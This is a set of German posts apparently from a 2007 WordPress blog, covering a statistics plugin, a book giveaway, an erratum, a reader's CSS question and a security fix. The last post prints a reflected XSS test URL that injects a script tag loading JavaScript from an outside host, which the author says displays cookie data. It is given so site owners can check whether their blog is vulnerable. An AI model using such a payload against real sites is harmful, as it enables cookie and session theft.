WordPress & Webwork - perun.net

Die Betreiber von Automattic.com beglücken uns – Besitzer von selbst-gehosteten WordPress-Blogs – mit einer weitere netten Anwendung. Neben Akismet (Anti-Spam) kann man sich nun das Statistik-Plugin holen. Das Plugin wird wie üblich in den Plugin-Ordner hochgeladen, aktiviert und dann muss man in das entsprechende Feld den WordPress.com-Schlüssel eintragen. Das ist übrigens der gleiche Schlüssel welchen man für Akismet braucht.

Die Statistik eignet sich gut für den schnellen Überblick: Flash-Grafik mit den Überblick der letzten 30 Tage, Top-Refferer, Top-Beiträge nach Aufrufen, die wichtigen Such-Begriffe, welche Links wurden aufgerufen und eine kleine Übersicht. Ist nett und wird alles schnell geladen. Ich teste es momentan in meinem Herr der Ringe-Weblog.

Einziger Haken: minimale Voraussetzung ist WordPress ab 2.1. Ist das jetzt ein Grund zum Update auf WP 2.1.x? Ein klares "Nö". Das Plugin ist nett und interessant, aber nichts weswegen man sein laufendes System auf den Kopf stellen sollte.

Ich habe das Fräulein Zufallszahl entscheiden lassen und Sie sprach mit sanfter Stimme:

1. Kommentar Nr. 24: TheoH
2. Kommentar Nr. 32: Ivana
3. Kommentar Nr. 43: Robert

Bei den anderen bedanke ich mich für das Mitmachen und tröstet euch, mit mir befindet ihr euch in guter Gesellschaft, ich habe bei solchen Gewinnspielen auch kein Glück. Wie war das noch mal: mal verliert man und mal gewinnen die anderen .

Nachtrag: Hallo Ivana, die Bücher an die beiden Herren sind schon unterwegs. Von dir habe ich leider noch keine Adresse bekommen. Ich habe dir bereits zwei E-Mails geschickt und noch keine Antwort bekommen. Ich fände es schade wenn ich noch mal auswürfeln müsste.

Im Kapitel L4, unter der Überschrift "Googles Blog-Suche" ist auf der Seite 228 die Abbildung mit der Nummer L4.41 falsch. Die richtige Abbildung gibt es hier zu sehen. Einfach auf das Bild in diesem Beitrag klicken.

Sollten mir weitere Fehler im Buch auffallen, so werde ich die selbstverständlich so schnell wie möglich hier dokumentieren.

Ich werde hier zwei drei Exemplare meines WordPress-Buches verlosen. Es gilt diesmal eine besonders schwere Frage zu beantworten:

Wie heißt der Autor des Buches "Das Einsteigerseminar WordPress":

1. Vladimir Klitschko
2. Vladimir Kaminer
3. Vladimir Putin
4. Vladimir Simovic

Bitte die Antworten als Kommentar oder auch als Ping- bzw. Trackback abgeben. Unter der richtigen Antworten wird dann mit Hilfe eines Generators die Zufallszahlen ausgeknobelt und somit die beiden Gewinner ermittelt.

Viel Glück … ach ja, der Rechtsweg ist ausgeschlossen und es werden Antworten bis 19. April 2007 um 12:00 berücksichtigt.

Nachtrag: auf Grund des großen Interesses, gibt es ein weiteres Exemplar zu gewinnen … also insgesamt drei Stück. Damit steigt die Gewinnchance ein bisschen.

Ich habe so eben das Komplettpaket (zip, 1mb) für die Leser des Buches aktualisiert. Die Grundlage des Paketes ist die Version 2.0.10, die neulich erschienen ist. In dem Paket befinden sich mehrere Themes und die im Buch vorgestellten und weitere nützliche Plugins.

Zudem beinhaltet das Paket die deutsche Sprachdatei, die Datei wp-config-sample.php beinhaltet in der Zeile 15 den Eintrag de_DE, eine leere .htaccess-Datei und den Unterordner /wp-content/uploads/ … im Grunde genommen nicht weltbewegendes, sollte aber einigen den Einstieg erleichtern.

Ich werde hier im Weblog, die Fragen der Leser (Das Einsteigerseminar WordPress), die über die E-Mail kamen hier veröffentlichen und beantworten. So lange mir die Fragesteller keine Erlaubnis geben, werde ich die Fragen natürlich anonym hier rein stellen. Hier die erste Frage:

ich lese gerade Ihr Buch WordPress, da ich einen eigenen Blog aufbauen will. Sie haben nun in Ihrem Buch geschrieben, dass die Datei style.css für das Design und das Layout zuständig ist. Ich benutze das Theme default_DE und wollt dies für meine Zwecke abändern. Nun meine Frage: Gibt es eine Erläuterung, was die einzelnen Angabe in der Datei style.css auslösen?

Ja, das stimmt. Die style.css ist in dem jeweiligen Theme zuständig für das was man als Layout bzw. Design bezeichnet. Dort werden die Angaben zu Farbwerten, Größen und der Positionierung der Bereiche notiert. Leider gibt es, so weit ich es weiß, keine explizite Dokumentation für die CSS-Datei des besagten Themes.

Grundsätzlich sollte man einiges an Vorwissen aus dem Bereich CSS mitbringen, wenn man die CSS-Dateien von WordPress-Themes ändern will. Auch wenn ich die einzelnen Bereiche der besagten CSS-Datei erklären würde, würde man ohne CSS-Vorwissen trotzdem sehr schnell – spätestens bei Browser-Inkompatibilitäten – den Frust-Bereich erreichen. Hier ein Beispiel der dies verdeutlicht:

body {
font-size: 62.5%; /* Resets 1em to 10px */
font-family: 'Lucida Grande', Verdana, Arial, Sans-Serif;
background: #d5d6d7 url('images/kubrickbgcolor.jpg');
color: #333;
text-align: center;}

Hierbei handelt es sich um den ersten Code-Abschnitten aus der o.g. CSS-Datei. Die erste Deklaration (erste Zeile) gibt an, dass für das gesamte Dokument die Basis-Schriftgröße auf 10 Pixel gesetzt wird. Hierbei müsste man natürlich wissen, dass in den modernen Browser die Standard-Schriftgröße auf 16 Pixel gesetzt ist (62,5% von 16px ist 10px).

Die dritte Deklaration bestimmt eine Hintergrundfarbe und ein Hintergrundbild für das gesamte Dokument. Die darauf folgende Deklaration bezieht sich aber auf die Schriftfarbe und hier ist der Wert in Kurzform notiert. Hierbei sollte man dann Kenntnisse über die Regeln für die Kurzform haben.

Die letzte Deklaration bestimmt eigentlich, dass der Text zentriert ausgegeben wird … allerdings ist der Text bei dem besagten Theme gar nicht zentriert. Hier wird ein Wert einer CSS-Eigenschaft "entführt" und für Layoutzwecke eingesetzt, damit auch der Internet Explorer bestimmte Layout-Bereiches innerhalb des Viewports (sichtbarer Bereich im Browser-Fenster) zentriert.

Daher würde ich, wenn kein CSS-Vorwissen besteht zur Lektüre folgender Websites:

• SelfHTML (speziell der Bereich CSS)
• CSS4You
• The Style Works
• Einführung in XHTML, CSS und Webdesign

und bei Bedarf zur Lektüre folgender Bücher raten:

• Little Boxes
• Modernes Webdesign mit CSS
• Einführung in XHTML, CSS und Webdesign

Die neuen Versionen von WordPress (2.0.10. und 2.1.3) stopfen auch ein paar Sicherheitslücken. Jens hat mich vor ein paar Tagen auf eine Demo aufmerksam gemacht in dem man herausfinden kann ob ein Weblog bedroht ist oder nicht. Einfach an die Domain seines Weblogs folgendes in der Adressleiste dranhängen:

index.php?year=%22%3E%3C/title%3E%3Cscript%20src=

http://h4k.in/j.js%3E%3C/script%3E

und aufrufen. Da die Zeile zu lang ist musste ich sie umbrechen, eigentlich muss alles in eine Zeile. Wenn du dann anstatt deiner Website irgendetwas mit XSS und jede Menge komischer Daten siehst, dann hat dein Weblog eine Lücke. Bei den ausgelesenen Daten handelt sich meiner Meinung nach um die Daten aus dem Cookie.

Wie gesagt, die neuen Versionen stopfen die Lücke und schon seit einiger Zeit konnte man sich die gepatchten Dateien auch einzeln herunterladen. Mich hat es aber gewundert warum bei mir trotz des Patches die Lücke noch vorhanden war. Da die Lücke auf den title-Tag abzielt habe ich daher als erstes das Plugin "Optimal Title" deaktiviert und diese Lücke war nicht mehr vorhanden.

In wie fern es sich hier um eine kritische Sicherheitslücke handelt, dass kann ich nicht sagen. Wer aber auch ohne das o.g. Plugin die Seitentitel so ausgeben möchte das zuerst der Beitragstitel und dann der Name der Website auftaucht – gut für Lesezeichenverwaltung und für die Suchmaschinen – der schaue sich bitte den Beitrag Optimaler Seitentitel in WordPress und die Kommentare an.